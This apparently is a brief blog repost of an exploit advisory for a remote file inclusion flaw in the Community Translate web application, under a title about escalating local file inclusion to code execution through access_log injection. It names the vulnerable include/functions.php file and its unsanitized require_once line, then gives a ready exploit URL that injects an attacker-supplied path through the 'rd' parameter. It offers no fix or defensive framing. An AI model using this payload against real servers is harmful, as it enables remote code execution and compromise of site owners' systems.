LFI to RCE via access_log injection

on
18

Community Translate RFI Vuln

on 

[o] Community Translate Remote File Inclusion Vulnerability
Software     : Community Translate
Project Home : http://code.google.com/p/communitytranslate/
Author       : NoGe
Contact      : noge[dot]code[at]gmail[dot]com
Blog         : http://evilc0de.blogspot.com/
Home         : http://antisecurity.org/

[o] Vulnerable file
require_once("$rd/include/utilfunctions.php");

include/functions.php

[o] Exploit
http://localhost/[path]/include/functions.php?rd=[evilc0de]


Comments

Post a Comment